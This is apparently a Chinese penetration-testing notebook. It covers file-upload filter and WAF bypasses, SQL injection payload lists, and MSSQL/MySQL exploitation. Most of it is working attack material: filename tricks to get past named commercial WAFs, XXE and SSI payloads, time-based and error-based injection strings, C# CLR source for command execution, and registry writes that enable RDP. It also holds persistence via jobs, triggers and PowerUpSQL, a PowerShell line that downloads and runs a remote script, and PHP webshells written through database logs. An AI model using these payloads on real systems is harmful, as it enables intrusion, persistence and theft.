將需要上傳的惡意代碼文件類型改為允許上傳的類型,例如將dama.asp改為dama.jpg上傳,配置Burp Suite代理進行抓包,然后再將文件名dama.jpg改為dama.asp。
上傳webshell.jpg.jsp,可能前端程序檢查后綴時,從前面開始檢查。

參考文章:

https://masterxsec.github.io/2017/04/26/文件上傳總結/

WAF繞過(阿里云、安全狗、百度云、云鎖)

1、阿里云WAF繞過

Content-Disposition:form-data;name="upload"; filename==="11111 .php" $x=$_get[×];'$X' 執行xxx.com?x=wget github的php大馬地址

參考鏈接:

https://www.t00ls.net/articles-51341.html --信息過于敏感,已被刪除 https://www.xj.hk/thread-1786.htm ---需要論壇用戶密碼可觀看

2、安全狗

1)===繞過

Content-Disposition:form-data;name="upload";filename==="11111.php"

2)去除""繞過

Content-Disposition:form-data;name="upload"; filename=11111.php

3)少"繞過

Content-Disposition:form-data,name="upload"; filename="11111.php

參考鏈接:

https://www.t00ls.net/articles-51253.html ---已被刪除,過于敏感 https://xz.aliyun.com/t/8000 --可復現

3、百度云

百度云繞過就簡單的很多很多,在對文件名大小寫上面沒有檢測php是過了的,Php就能過,或者PHP,一句話自己合成圖片馬用Xise連接即可

Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"

或者文件名.php回車,這樣引號就在另一行,同時上傳內容的一句話前面加個中文字符

https://www.cnblogs.com/bmjoker/p/9141322.html

4、云鎖

Content-Disposition:form-data;name="up_picture"; filename="yjh.c.php


另外復現參考文章:

https://www.hacking8.com/sectips/bypasswaf.html

實戰分析

1、通過上傳zip模板后服務器自解壓獲取webshell

https://4hou.win/wordpress/?cat=2035

2、黑名單繞過之文件名可控
復現:

https://blog.csdn.net/qq_25899635/article/details/90344198 https://www.cnblogs.com/thespace/p/12346021.html

3、高并發繞過上傳總結

upload-labs靶場有環境

https://www.cnblogs.com/aq-ry/p/10063913.html ---安裝

upload-labs包含了大多數文件上傳類型,一個包含幾乎所有類型上傳類型的靶機,值得學習!!


4、跨目錄上傳繞過waf

訪問aspx馬

https://xz.aliyun.com/t/7860

或者利用…/跳到上層目錄,shell傳到上層,執行即可…


upload-labs過關

這臺靶機很舒服,文件上傳的各種騷操作基本都能實現

1、前端 2、修改content-type為image/gif3、黑名單:php3,phtml4、黑名單:上傳.htaccess5、黑名單:大小寫phP 6、黑名單:空格7、黑名單:點8、黑名單:::$DATA 9、黑名單:info.php.. (點+空格+點) 10、黑名單:雙寫11、白名單:get型%00截斷 12、白名單:post型%00截斷,url解碼13、上傳圖片馬,配合包含漏洞14、條件競爭

根據14個條件,開始打upload-labs靶機吧…


造洞

文件上傳漏洞:↓

html文件:造出一個xss漏洞 swf文件:造出一個xss漏洞 svg文件:造出一個xss漏洞 pdf文件:造出一個XSS漏洞和URL跳轉漏洞 exe文件:釣魚 mp4,avi文件:ssrf漏洞 任意后綴文件,只要文件內容為xxe: shtm1文件:ssi命令執行 xlsx:xxe漏洞

這里舉幾個例子:

1、svg文件
1.svg

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/> https://xz.aliyun.com/t/1126

2、swf文件

http://127.0.0.1/swfupload.swf?movieName="]%29}catch%28e%29{if%28!window.x%29{windows.....%29//

3、任意文件后綴,只要內容是xxe內容

XXE代碼:

#EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, conca:http://vps_ip:VPS_PORT/header.m3u8 #EXT-X-ENDLIST

讀取文件payload

4、shtml文件 ssi命令執行

<! --#ECHO var="SERVER_SOFTWARE"--> <! --#echo var="server_name" --><! --#echo var="remote_user" -->

命令參考鏈接:

https://www.secpulse.com/archives/66934.html

5、xlsx文件 XXE

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM ' http://test.joychou.me:8081/evil.xlsx">%remote;]><root/> https://www.redhatzone.com/ask/article/1359.html --另外思路

Xlsx文件構造:

1、新建一個xlsx文件 2、修改后綴為.zip,并解壓 3、打開[Content_Types].xm1,在頭部加入xxe payload 4、重新壓縮當前文件夾為zip,之后修改后綴為xlsx 5、在上傳點上傳改文件,上傳后服務器自動打開文件,觸發xxe6、Dnslog平臺查看結果

2.2.10 注入漏洞

類型:

數據庫種類:Access注入,Mysql注入,Mysql注入,Oracle注入注入點:GET注入,POST注入,Cookie注入 (ua注入) 注入點類型:數字型注入,字符型注入,搜索型注入注入種類:聯合注入,盲注(布爾,時間,報錯)

Access注入

https://www.jianshu.com/p/ace43a7a331e

MSSQL注入

POC:↓
查詢版本

1’ and @@version>0--

查詢權限

1' and user>0--

數據庫

1' and db_name()>0-- 6csfx1' and (SELECT top 1 Name FROM Master.. SysDatabases)>0-- masterand 1=(select name from master.dbo.sysdatabases where dbid=1)-- //暴庫名DBID為1,2,3....and 1=(select name from master.dbo.sysdatabases where dbid=2)-- tempdband 1=(select name from master.dbo.sysdatabases where dbid=3)-- modeland 1=(select name from master.dbo.sysdatabases where dbid=4)-- msdband 1=(select name from master.dbo.sysdatabases where dbid=5)-- ReporServer . . . . . . and 1=(select name from master.dbo.sysdatabases where dbid=12).... . . .

簡單的列舉,其余就不列舉了,按照長度不同可以自行測試,后面會詳細介紹

1' And (sElect Top 1 name from sysobjects where xtype=0x55)>0-- Users

' SELECT * FROM Users HAVING 1=1-- Users.pkId

' And (sElect Top 1 UserName from Users)>0-- default' and 1=convert(int,(SELECT TOP 1 User Name FROM Users WHERE ID NOT IN('1')))--

MYSQL注入

https://blog.csdn.net/weixin_45728976/article/details/103932264

Mysql5.0以下

同理Access注入類似

Mysql5.0以上注入
order by解釋

union解釋


#檢測:

http://demo.sqli.com/Less-1/?id=1'select username, password from security.users where id = '1' limit o, 1;

#列數:

http://demo.sqli.com/Less-1/?id=1' order by 3 %23select username, password from security.users where id = '1' order by 3 %23 ' limit

#聯合查詢

http://demo.sqli.com/Less-1/?id=1' union select 1,2,3 %23

#爆顯位

http://demo.sqli.com/Less-1/?id=-1' union select 1,2,3 %23

#獲取用戶名

http://demo.sqli.com/Less-1/?id=-1' union select 1,user(),3 %23

#獲取數據庫名

http://demo.sqli.com/Less-1/?id=-1' union select 1,database(),3 %23

#獲取表名

http://demo.sqli.com/Less-1/?id=-1' union select 1,group_concat(table_name),3 form information_schema.tables where table_schema =database()

#獲取列表名

http://demo.sqli.com/Less-1/?id=-1' union select 1,group_concat(column_name),3 form information_schema.columns where table_name ='users'

#獲取數據

http://demo.sqli.com/Less-1/?id=-1' union select 1,group_concat(user_name),group_concat(password) from users

參考:https://www.jianshu.com/p/5e8a65771641

少見的注入點

搜索框注入

輸入1’,對語法錯誤進行判斷,注入即可


其他點注入

Client-IP User-Agent

https://blog.csdn.net/weixin_45146120/article/details/100588267 --參考文章

盲注

何為盲注?盲注就是在sql注入過程中,sql語句執行的選擇后,選擇的數據不能回顯到前端頁面。此時,我們需要利用一些方法進行判斷或者嘗試,這個過程稱之為盲注

延時注入是主要針對頁面無變化、無法用布爾真假判斷、無法報錯的情況下的注入技術

報錯注入構造payload讓信息通過錯誤提示回顯出來

1、布爾盲注

https://www.jianshu.com/p/f0174ea6c69d

2、時間盲注

https://www.jianshu.com/p/0d607589e3ad

3、報錯注入

https://xz.aliyun.com/t/253 http://aiyuanzhen.com/index.php/archives/34/ https://www.jianshu.com/p/bc35f8dd4f7c --12種報錯注入

Sqlmap

os-shell Mysql
注入點恰巧又是root權限,這時你就可以直接嘗試往目標的網站目錄里面寫webshell,但還是有個前提,secure_file_priv為空

https://xz.aliyun.com/t/7416


遇到這種去情況時,如果上傳不成功,有三種原因:
1)mysql高版本的安全模式,secure_file_piv的值為null

進入--sql-shell show global variables like '%secure%'; 當secure_file_priv的值為null,表示限制mysqld 不允許導入 | 導出,那就無法寫入馬

2)secure_file_priv指定了某個目錄才可以上傳,根目錄不允許上傳,那么可以嘗試往upload目錄

往upload等其他目錄上傳,不要往根目錄上傳即可

3)secure_file_priv的值為空或者指定了某個目錄,但是上傳后的文件為空,沒有內容寫進去

https://zhuanlan.zhihu.com/p/58007573或者手動寫入https://xz.aliyun.com/t/7416

–os-shell MSSQL

輸入: os-shell> for /r C: %i in (*xxx*) do @echo %i https://xz.aliyun.com/t/7942

導入導出

#SELECT INTO OUTFILE 導入,寫入文件

https://ivanzz1001.github.io/records/post/database/2018/10/19/mysql-basis_part18

#load_file 導出,讀取文件

https://www.xcnte.com/archives/512/

如果讀取不出來,則將讀取的內容寫入到當前web目錄里,后綴為txt,然后訪問



參考該思路…


總結

%5c,%bf',單引號,雙引號,反斜杠,負數,特殊字符,and,or,xor探測是否存在注入!!! 注意:(-- )一定要在注釋符號后加空格,或者URL編碼后的空格(%20),否則注釋符號不會產生作用 注釋符# --+交替用,一個不行,就另一個 1)先判斷是數字型還是字符型,如果判斷不出來跳到9 2)接著判斷有沒有括號 3)最后面跟上--+注釋符 4)order by判斷字段數,如果沒法判斷,則直接union select 1,2,3一個個測試過去5)如果返回的頁面發生變化,則聯合查詢6)如果union select 1,version(),3返回的頁面沒有發生變化,即聯合查詢失敗,則嘗試報錯注入 7)如果報錯注入頁面也沒有把信息顯示出來,則進行延時注入 8)如果延時注入也不行,則導入導出 9)嘗試延時注入,如果從1過來的,則三種情況,直接跟payload,參數后面加單引號或者雙引號

Payload

數字型:–+或者#

or 1=1or 1=1 --+)or 1=1--+/***/or/***/2/***/like/***/1-- 用/***/替換空格,用like替換= 具體案例看漏洞

字符型:–+或者#

' or '1'='1' or 1=1 --+' ) or 1=1 --+ ‘))or 1=1 --+" or "1"="1 " or 1=1 --+ ") or 1=1 --+ "))or 1=1 --+

其他函數:

or rpad('',1, user())和or Ipad('',1,user())="r"

偽靜態:使用%5c,%5c是\的url編碼

http://url/Home/Orders/index/currency/%5c.html

1)布爾

2)延時,如果過了5秒才顯示頁面,則存在注入

mysql:BENCHMARK (100000,MD5 (1)) or sleep(5)

id=1' and sleep( if( (select length(database()) >0) , 5, 0 ) )%23 id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ id=1' or sleep(ord(substr(password,1,1))) -- id=1' XOR(sleep(if((select length(database()) >6),0,5)))XOR'Z id=1' and (SELECT 1 FROM (SELECT(SLEEP(5)))Gbqj) --+ id=1'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(5)))ibEg)/** Referer:1'XOR(if(now()=sysdate(),sleep(6),0))XOR'Zua:'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z x-forw:'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

mssql:

id=1' WAITFOR DELAY '0:0:5'--+ id=1';WAITFOR DELAY '0:0:5'--+ id=1');WAITFOR DELAY '0:0:5'--+ id=1" WAITFOR DELAY '0:0:5'--+ id=1";WAITFOR DELAY '0:0:5'--+ id=1");WAITFOR DELAY '0:0:5'--+ id=1' or 51 = '49'; WAITFOR DELAY '0:0:5'--+

只是常見的,可以繼續枚舉…

#報錯注入,爆數據庫版本

以下payload都是數字型,如果是字符型,就在1后面添加單引號或者雙引號

id=1+and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+ id=1+and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+ id=1+and geometrycollection((select * from(select * from(select user())a)b))--+ id=1+and multipoint((select from(select * from(select user())a)b))--+ in d=1+and polygon((select * from(select * from(select user()a)b))--+ id=1+and multipolygon((select * from(select * from(select user())a)b))--+ id=1+and linestring((select * from(select * from(select user())a)b))--+ id=1+and multilinestring((select * from(select * from(select user()a)b))--+ 1d=1+and exp(~(select * from(select user())a))--+ PostgreSQL:/?param=1 and(1)=cast(version() as numeric)--+

Oracle報錯注入

' AND 1932(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(113)||(SELECT+(CASE+WHEN 如果sq1map跑不出,則加參數 --level 5 --risk 3 risk 共有四個風險等級,默認是1會測試大部分的測試語句,2會增加基于事件的測試語句,3會增加0R語句的SQL注入測試

2.2.10.1 MSSQL利用總結(dayu-Eighth day)

命令執行

1、xp_cmdshell

開啟xp_cmdshellsp_configure 'show advanced options',1reconfiguregosp_configure 'xp_cmdshell',1reconfigurego執行exec xp_cmdshell "whoami"//在mssql中,轉義符為"""轉義字符"""恢復被刪除的xp_cmdshellEXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'提示找不到xplog70.dll則需要自己上傳。

2、sp_oacreate

打開組件

EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;

執行

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

此方法無回顯,可把命令執行結果寫到web路徑下或者配合dns側信道


3、沙盒執行

需要當前mssql用戶有寫注冊表權限開啟exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1執行select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

在默認安裝mssql 2012上報錯 “無法創建鏈接服務器“(null)”的 OLE DB 訪問接口“microsoft.jet.oledb.4.0”的實例。” 暫未找到解決辦法


4、CLR執行

Common Language Runtime(CLR)程序集定義為可以導入SQL Server的.NET DLL(或DLL組)。導入后,DLL方法可以鏈接到存儲過程并通過TSQL執行。創建和導入自定義CLR程序集的能力是開發人員擴展SQL Server本機功能的好方法,但自然也為攻擊者創造了機會。以C#代碼為例,將下面代碼用CSC編譯為dll

using System;using System.Data;using System.Data.SqlClient;using System.Data.SqlTypes;using Microsoft.SqlServer.Server;using System.IO;using System.Diagnostics;using System.Text;public partial class StoredProcedures{[Microsoft.SqlServer.Server.SqlProcedure]public static void cmd_exec (SqlString execCommand){Process proc = new Process();proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);proc.StartInfo.UseShellExecute = false;proc.StartInfo.RedirectStandardOutput = true;proc.Start();// Create the record and specify the metadata for the columns.SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));// Mark the beginning of the result set.SqlContext.Pipe.SendResultsStart(record);// Set values for each column in the rowrecord.SetString(0, proc.StandardOutput.ReadToEnd().ToString());// Send the row back to the client.SqlContext.Pipe.SendResultsRow(record);// Mark the end of the result set.SqlContext.Pipe.SendResultsEnd();proc.WaitForExit();proc.Close();}};

編譯

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs //主意.net版本

得到的DLL上傳到目標,設置dll文件權限,否則mssql可能因為文件權限問題導致讀取dll失敗

開啟CLR

sp_configure 'show advanced options',1RECONFIGUREGO-- Enable clr on the serversp_configure 'clr enabled',1RECONFIGUREGO

遇到權限問題,需要設置數據庫擁有者為sa,這個方法不能使用master數據庫來執行查詢語句

alter database [數據庫名] set TRUSTWORTHY onEXEC sp_changedbowner 'sa'

接著執行

-- Import the assemblyCREATE ASSEMBLY my_assemblyFROM 'c:\temp\cmd_exec.dll'WITH PERMISSION_SET = UNSAFE;Go-- Link the assembly to a stored procedureCREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];GO

接下來就可以執行命令了

這個方法還可以通過16進制文件流的方式導入DLL,這樣可以不用文件落地


5、com對象

開啟

EXEC sp_configure 'Ole Automation Procedures',1

執行

declare @dbapp int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@dbapp output;--exec sp_oamethod @dpapp,'run',null,'calc.exe';exec sp_oamethod @dbapp,'exec',@exec output,'C:\\windows\\system32\\cmd.exe /c whoami';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str outselect @str

注冊表

1、讀注冊表

EXEC xp_regread 'HKEY_CURRENT_USER','Control Panel\International','sCountry'


2、寫注冊表

master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; #開啟遠程桌面

3、刪除操作

exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName' //刪除值execmaster.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey' //刪除鍵

4、添加值

EXECUTE master..xp_regaddmultistring@ rootkey ='HKEY_LOCAL_MACHINE',@ key ='SOFTWARETest',@ value_name ='TestValue',@ value ='Test'

5、枚舉可用的注冊表鍵

EXEC master..xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International'


持久化

1、定時任務

啟用sql server代理,右鍵-新建-作業

步驟-新建

配置執行的語句,可以自定義

然后在“計劃”選項里配置執行時間

此外,可以使用十六進制CLR新建一個存儲過程然后用計劃作業執行存儲過程,這樣更加隱蔽

2、觸發器

觸發器用于在執行指定語句動作之后執行sql語句,如update,可配合注入使用

SET ANSI_NULLS ONGOSET QUOTED_IDENTIFIER ONGO CREATE TRIGGER [test222]ON [test]AFTER UPDATE /*建立一個作用于表test的、類型為After update的、名為 test222的觸發器*/AS BEGINEXECUTE MASTER.DBO.XP_CMDSHELL 'cmd.exe /c calc.exe'ENDGO

在對表進行update操作之后,就會執xp_cmdshell


文件操作

1、判斷文件是否存在

exec xp_fileexist "C:\\users\\public\\test.txt"

返回0表示文件不存在,1表示存在。在執行無回顯命令時,把執行結果重定向到一個文件,再用xp_fileexist判斷該文件是否存在,就可知道命令是否執行成功

2、列目錄

exec xp_subdirs "C:\Users\Administrator\",2,1

第一個參數設定要查看的文件夾。 第二個參數限制了這個存儲過程將會進行的遞歸級數。默認是零或所有級別。第三個參數告訴存儲過程包括文件。默認是零或只對文件夾,數值 1 代表包括結果集的文件


3、寫文件

exec sp_makewebtask 'c:\www\testwr.asp','select''<%execute(request("SB"))%>'' '需要開啟Web Assistant Proceduresexec sp_configure 'Web Assistant Procedures', 1; RECONFIGURE在sql server 2012上開啟失敗

4、創建目錄

exec xp_create_subdir 'D:\test'

5、壓縮文件

exec xp_makecab 'c:test.cab', 'mszip', 1, 'c:test.txt' , 'c:test1.txt'

它允許你指定一列你想壓縮的文件還有你想放進去的 cab 文件。它甚至允許你選擇默認壓縮, MSZIP 壓縮 ( 類似于 .zip文件格式 ) 或不壓縮。第一個參數給出到 cab 文件的路徑,這是你想創建和添加文件的地方。第二個參數是壓縮級別。如果你想使用詳細的日志記錄就使用第三個參數。第四個參數后跟著你想壓縮的文件的名稱。可以在擴展存儲過程里傳 多個要壓縮的文件名稱


信息獲取

1、獲取機器名

exec xp_getnetname

2、獲取系統信息

exec xp_msver


3、獲取驅動器信息

exec xp_fixeddrives


4、獲取域名

SELECT DEFAULT_DOMAIN() as mydomain;

5、遍歷域用戶

先獲取RID

SELECT SUSER_SID('CATE4CAFE\Domain Admins')


利用RID前48位即0x010500000000000515000000F80F57B63AF32D50A0916B7B構造SID即可遍歷域用戶。我們知道,域用戶的SID是從500開始,所以把500轉換成16進制,為01F4,在mssql里需要翻轉為F401,然后用0000補足得到0x010500000000000515000000F80F57B63AF32D50A0916B7BF4010000,在mssql里查詢


采用循環SQL語句遍歷即可遍歷出所有域用戶

msf有個模塊可通過注入點枚舉域用戶

參考文章:

https://cloud.tencent.com/developer/article/1506821 --感謝雷神眾測大佬的分享

2.2.10.2 攻擊MSSQL–PowerUpSQL 介紹

發現MSSQL實例

發現本地實例

通過SPN查找域內mssql實例

通過廣播查找mssql實例

通過UDP查找網絡內的mssql實例

接受機器名或者IP


獲取MSSQL信息

獲取配置信息
獲取服務信息

測試口令

獲取默認密碼實例

在腳本中提供了默認安裝的一些實例名和默認密碼,但是不包括MSSQLSERVER和SQL Express(避免賬號鎖定)。可以根據自身需要加入自定義的賬號密碼


使用字典測試
命令的含義是通過管道爆破可以連接的發現的實例。此外,該函數還可以嘗試通過Invoke-SQLOSCmd執行命令

持久性

啟用存儲過程

在SQL Server啟動時添加數據庫管理賬戶Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -NewSqlUser EvilSysadmin1 -NewSqlPass Password123!添加windows管理員Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -NewosUser Evilosadmin1 -NewosPass Password123!執行 powershell命令Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "MSSQL2008WIN8" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.xxxxxxusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')"

寫注冊表

Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe -Command 'c:\windows\system32\cmd.exe' -Instance "MSSQL" -Username "sa" -Password "_PL<0okm"RDP后門,需要當前mssql用戶有寫注冊表權限

作業

除了CMD,還支持VBScript、powershell、JScript

此外,工具還集成了一些通過mssql執行系統命令的方式

Invoke-SQLOSCmdInvoke-SQLOSCmdCLRInvoke-SQLOSCmdCOleInvoke-SQLOSCmdPython Invoke-SQLOSCmdR

觸發器

工具支持創建DDL和DML兩種觸發器Get-SQLTriggerDdl -Instance SQLServer1\STANDARDDEV2014 -username '' -password ''Get-SQLTriggerDml -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -username '' -password ''可根據實際情況定義觸發條件

獲取域信息

當前域用戶信息


域用戶


域機器

更多用法可自行查看命令參數,或者查看項目wiki

防御方案

增加賬號的口令強度 用低權限賬號連接數據庫 修改默認實例的默認口令

2.2.10.3 如何利用Mysql安全特性發現漏洞

前言
在滲透測試時,面對Mysql環境,需要用到load_file與into outfile時,會發現無法使用load_file讀取不到系統文件、同時into outfilet無法寫入后門進行getshell,這時候就有必要了解下Mysql數據庫特性secure_file_priv變量安全配置。此變量用于限制數據導入和導出操作,執行的效果 LOAD DATA和SELECT… NTO OUTFILE報表和LOAD_FILE()功能。僅允許具有此FILE權限的用戶執行這些操作

**

Mysql權限

**

1、管理權限使用戶能夠管理MySQL服務器的操作。這些權限是全局的,因為它們不是特定于特定數據庫的

2、數據庫權限適用于數據庫及其中的所有對象。可以為特定數據庫或全局授予這些權限,以便它們適用于所有數據庫

3、可以為數據庫中的特定對象,數據庫中給定類型的所有對象(例如,數據庫中的所有表)或全局的所有對象授予數據庫對象(如表,索引,視圖和存儲例程)的權限。所有數據庫中給定類型的對象

**

load_file函數用法

本次提到的內容涉及的是GRANT和REVOKE的允許靜態權限中的file在滲透測試過程中,碰到 load_file讀取文件的前提條件:

MySQL LOAD_FILE()讀取文件并以字符串形式返回文件內容。

LOAD FILE(file name)

其中file_name是帶路徑的文件名。


實例:

SELECT * LOAD_FILE ('/home/username/myfile.txt')

要成功使用load_file讀取文件有幾個前提:

1)嘗試加載的文件必須存在于運行MySQL服務器的同一主機中

2)加載文件必須指定文件的完整路徑名

3)正在執行該命令的用戶必須具有FILE權限

4)加載的文件不得超過 max_allowed packet變量指定的值

5)MySQL有一個secure_file_priv變量。如果該變量的值設置為非空目錄名,則要加載的文件必須位于該目錄中

Mysql版本差異

5.5.53之前版本,默認情況下此變量為空,允許使用mysql終端對secure_file_priv參數更新(不討論windows環境安裝情況)

5.5.53及之后版本修改secure_file_priv值只能修改my.cnf配置文件(不討論windows環境安裝)

成功利用實例

案例

環境:

MySQL5.5版本 RedHat6.2版本

僅能使用navicat連接數據庫(非root權限用戶):

目標:

使用locd_file讀取服務器文件、讀取站點配置文件、站點源碼,進一步getshell

show global variables like '%secure%';

secure_file_priv的值為null,那么secure_file_priv這里都有什么設置呢

secure_file_priv為null表示不允許導入導出

secure_file_priv指定文件夾時表示mysql的導入導出只能發生在指定的文件夾

secure_file_priv沒有設置時則表示沒有任何限制

想要成功利用load_file函數,必須設置secure_file_priv變量為空,這樣讀取文件也就沒有限制

set global secure_file_priv=";

注意:修改secure_file_priv配置后,需要重啟mysql才能生效。

進一步讀取:etc/passwd文件

select load_file('/etc/passwd');


讀取出來后(BLOB)1.26KB,發現為BLOB二進制數據,為方便獲取文件信息,

使用 wireshark讀取 MySQL協議中的第一 Request Query信息:

然后在wireshark中查看TCP流就能看到passwd信息…
這是一個思路!!

腦洞大開

關于 into outfilel函數,用于寫入文件進行geshell,利用該函數同樣前提

1、secure_file_ priv為空,能夠寫入文件2、具備寫入特定目錄,如 /var/www/htm網站路徑權限3、寫入的文件能夠正常解析

另外一種思路(需要mysql roo權限)

1、修改 general_ log的值為on,同時general_log_file修改為網站絕對路徑+文件2、在網站查詢sql語句(偽造sql語句的查詢一句話后門,很多情況下僅能寫入php),將會向網站路徑下寫入sql語句,訪問寫入的文件,可成功getshe‖

總結:
很多情況下碰到的實戰環境特別苛刻、嚴格,不是像在靶機環境一樣一帆風順,往往需要靈活應對各種不同復雜環境,從中找出一條適合自己測試的方向


2.2.10.4 Hibernate基本注入

基本概念

JDBC:提供了一組 Java API來訪問關系數據庫的Java程序

ORM:對象關系映射

實體類與數據庫表一一對應 不需要操作數據庫,而是操作實體類對象

Hibernate :

基于ORM的一種框架對JDBC代碼進行封裝 開發者不需要寫SQL語句就能實現對數據庫進行增刪改查屬于dao層 適用于MS SQLSERVER、ORACLE、SQL、H2、Access和Mysql等多種數據庫

參考文章:

https://xuzhongcn.github.io/hibernate/01/Hibernate01.html --詳細介紹 https://www.cnblogs.com/-qing-/p/11650774.html --注入攻擊 https://cloud.tencent.com/developer/article/1035345 --注入攻擊

這里對于Hibernate注入提幾個思路點:

#添加操作代碼

使用save,不太可能會出現拼接漏洞

因此在添加、創建操作下,Hibernate大概率不會出現注入漏洞

Usertestusertest=new Usertest(); usertest.setUsername(username); usertest.setPassword(password); session.save(usertest);

#查詢操作代碼

createQuery容易岀現拼接漏洞 實際上,比較容易出現漏洞的是在 like '%xxx%'、 order by xxx這種語句中 修改操作和刪除操作代碼中如果存在**査詢操作代碼**,也有可能岀現拼接漏洞

#Hibernate支持輸入

and or database() user() version() ascii()

假設開發者未進行過濾,則可存在萬能密碼

1' or '1'='1 1' or user() like '%root%

#Hibernate不支持輸入 union/select

因此無法進行爆庫

#暴露路徑 com.springboottest.teston.security.module.Usertest

Usertest是定義用戶的類,其與數據庫中的用戶數據表一一對應,因此很有可能就是數據表名

#猜解字段名

password是另一字段名,因此輸入以下語句并未報錯

1' or password='2


password1是不存在的字段名,因此輸入以下語句報錯

1' or password1='2


2.2.10.5 mysql 利用general_log_file、slow_query_log_file寫文件

高版本的mysql中,一般默認配置了–secure_file_priv為null限制了文件寫入,這時,可以通過mysql的general_log_file、slow_query_log_file來嘗試寫文件

general_log_file

set global general_log='on' SET global general_log_file='D:/phpstudy/www/1.php'; SELECT '<?php assert($_POST["cmd"]);?>'; set global general_log='off'; //切記關閉

slow_query_log_file
用到了mysql的慢查詢,全名是慢查詢日志,是MySQL提供的一種日志記錄,用來記錄在 MySQL中響應時間超過閥值的語句。開啟之后默認閥值是10s,可以更改此時間

set global slow_query_log=on; set global slow_query_log_file="C:\\phpstudy\\PHPTutorial\\www\\3.php select sleep(15),'<?php assert($_POST["cmd"]);?>' set global slow_query_log=off

參考文章:另外的思路

https://www.k0rz3n.com/2018/10/21/Mysql%20在滲透測試中的利用/ --general_log_file利用寫入shell https://www.cnblogs.com/-mo-/p/11677621.html --slow_query_log_file利用方法

2.2.10.6 SQL Server注入 Getshell 有趣案例

這里感謝傾旋大佬的思路分享
傾旋大佬博客:https://payloads.online/posts/
參考我之前寫的一篇文章:某次項目技術點實錄-Regsvr32 ole對象

0x01 前言

本文非基礎類的普及文章,主要分享內網中遇到的一個有趣案例。

0x02 Bypass注入點

通常情況下,遇到SQL Server注入點,我會比較關注是否是DBA權限,如果是,那么就可能拿到執行命令的權限,進而反彈到C2上,方便后續的后滲透工作。

一開始在一處比較復雜的功能點發現了SQL Server的注入,也是首先利用AND進行判斷:

參數:ModuleType存在注入點,但是后面有一層站點全局輸入的檢測機制,從簡單的測試來看,是不存在語法分析的一種,比較容易繞過。

我嘗試了以下方案:

and -> And and -> /**/And and -> /*xsww!s*/And and -> /*xswwS1154-_[0)}!s*/And and -> /***/And

最終發現第五種可以繞過,使得后端無法辨別/***/是否和And是一個本體。

那么我猜想到了一個簡單的表達式,似乎和這個過濾規則比較相向:/*\w{0,}*/

0x03 tamper 自動化實現

這里直接改了以下space2comment.py,這個腳本在Kali Linux中的sqlmap目錄下:

核心代碼:

for i in xrange(len(payload)):if not firstspace:if payload[i].isspace():firstspace = TrueretVal += "/**/"continueelif payload[i] == '\'':quote = not quoteelif payload[i] == '"':doublequote = not doublequoteelif payload[i] == " " and not doublequote and not quote:retVal += "/**/"continue

只需要替換/**/即可:

接著,就可以跑出注入了~

PS:我比較習慣于添加--random-agent參數,理由是在注入的過程中,避免被流量感知設備發現。

0x04 xp_cmdshell

到這一步的時候,我遇到了一個問題,SQLMAP調用exec master…xp_cmshell的時候被攔截了,因為后端還檢測是否有exec、master,于是我還要將tamper加兩句:

payload = payload.replace("exec","/***/Execute/***/") payload = payload.replace("master..","/***//***/")

最終結果:/***/execute/***//***/xp_cmdshell/***/'whoami'

點擊發包,還是無法執行,被360攔截了!

這個Error Code 5 ,是Windows的錯誤代碼,中文意思就是:“拒絕訪問”。

現在xp_cmdshell被攔截的很多了,但是sp_oacreate應該可以使用的:

參考我之前寫的一篇文章:Regsvr32 ole對象

